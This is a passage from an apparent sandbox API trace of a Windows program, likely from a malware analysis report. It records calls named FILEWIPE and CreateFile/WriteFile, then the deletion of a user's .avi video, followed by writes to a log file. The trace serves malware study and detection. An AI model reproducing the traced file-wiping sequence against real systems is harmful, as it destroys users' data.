lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.852] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.852] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.852] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.852] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.852] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.853] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.853] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.853] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.854] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.854] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0198.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.855] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x6c1ae300, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 0x90ae18 [0198.855] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0198.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.855] CharLowerBuffW (in: lpsz="byte[98588]", cchLength=0xb | out: lpsz="byte[98588]") returned 0xb [0198.856] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.856] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.856] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.856] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.856] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.856] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.857] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.857] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.857] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.857] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.862] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.862] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\448l4fbhgcro5ywrmwv_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.863] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.863] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.863] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.863] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.864] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.864] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.864] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.864] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.864] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.864] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.864] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.864] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", lpFilePart=0x0) returned 0x4b [0198.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x1b6d1b00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 0x90ae18 [0198.865] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\448l4fbhgcro5ywrmwv_.avi")) returned 1 [0198.867] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9682a920, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x6c1ae300, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0x1b6d1b00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1811c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="448L4fbhgcrO5YwRMWv_.avi", cAlternateFileName="448L4F~1.AVI")) returned 0 [0198.867] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.869] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.870] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.870] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.870] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.870] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.871] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.871] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.871] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.871] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.871] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.871] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.871] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.872] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.872] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3d4c, lpOverlapped=0x0) returned 1 [0198.872] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.872] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3d4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.872] 